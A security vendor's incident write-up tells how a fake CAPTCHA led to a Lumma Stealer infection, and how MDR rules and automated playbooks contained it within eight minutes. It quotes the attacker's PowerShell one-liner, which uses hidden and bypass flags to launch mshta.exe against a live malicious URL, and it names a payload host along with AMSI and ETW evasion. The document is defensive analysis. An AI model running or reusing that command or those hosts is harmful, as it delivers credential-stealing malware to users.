Our previous post, Beyond EDR: CYREBRO MDR Exposes the Unseen, covered how calm dashboards can hide active compromise. Deep-diving into it, we’ll show how a recent single fake CAPTCHA launched a brand-new Lumma Stealer variant and how CYREBRO’s MDR engine slammed the door in eight minutes.

From Quiet Console to Critical Alert

Why native EDR stayed silent

At 22:09 UTC a Windows 11 workstation launched a hidden PowerShell process. Because the binary was signed and the command line exceeded the EDR’s default logging length, no alert was raised. Thirty-four seconds later the CRRU’s MDR layer generated a critical-severity incident, linking five separate rule hits into one storyline.

The five MDR rules that changed everything

Chronology of an Attack: Fake CAPTCHA to Data Theft

Initial access via click-jacked CAPTCHA and mshta.exe

The user encountered a CAPTCHA that loaded from https[:]//amacys[.]shop/sports.mp4. A mouse click fired mshta.exe with the same address, running remote script without local drop-files.

Hidden PowerShell with risky flag combinations

mshta.exe spawned two PowerShell sessions:

powershell.exe -w 1 -ep bypass -nop -C ` "$l='https://amacys.shop/sports.mp4';Invoke-CimMethod ` -ClassName Win32_Process -MethodName Create ` -Arguments @{CommandLine=('ms'+'hta'+'.exe '+$l)}"

A second block decrypted a 256-byte AES string directly in memory, disabling AMSI and tampering with Event Tracing for Windows to hide its tracks.

Payload delivery and attempted exfiltration

The decrypted payload contacted mapped03[.]sportsspot-moviebuffs[.]com/zibaa01.tiff over 443, unpacking Lumma Stealer. Within 98 seconds the malware tried to enumerate browser data and schedule persistence, yet the connection was cut immediately because CYREBRO’s automated playbooks had already isolated the host.

How CYREBRO’s Centralized Security Operations Platform Turned Insight into Action

All endpoint telemetry funnels into CYREBRO’s SOC Platform and Security Data Lake. There, correlation logic linked every process, registry edit, DNS request and network call into one storyline.

Platform playbooks then:

• Isolated the workstation via EDR API
• Captured volatile memory for DFIR review
• Terminated and quarantined seven processes
• Alerted the security team by portal, email and phone

Total dwell time from initial click to containment: 8 minutes.

After that, our analysts took control of the case. They completed a full investigation, confirmed the threat was contained, and made sure no other systems were affected. The host was rebuilt, passwords reset, and the client was guided through every step of recovery.

Actionable Defenses for Blue Teams

• Train users to treat unexpected CAPTCHA pages with suspicion.
• Consider to limit or block mshta.exe where business workflows do not require it.
• Alert on PowerShell sessions running hidden, and using suspicious flags.
• Keep full-length command lines in your log pipeline, truncation equals blind spots.
• Layer IOC-driven MDR on top of reputation-based EDR to catch brand-new threats, like this Lumma variant, which scored 0/71 across AV engines at the time of detection.

Conclusion

One fake CAPTCHA was all it took to bring a fresh Lumma variant inside the perimeter. Five MDR rules, a Security Data Lake and automated playbooks kept the incident to eight minutes of drama instead of days of silent data loss.

FAQ – How does Lumma Stealer evade EDR and how can MDR close the gap?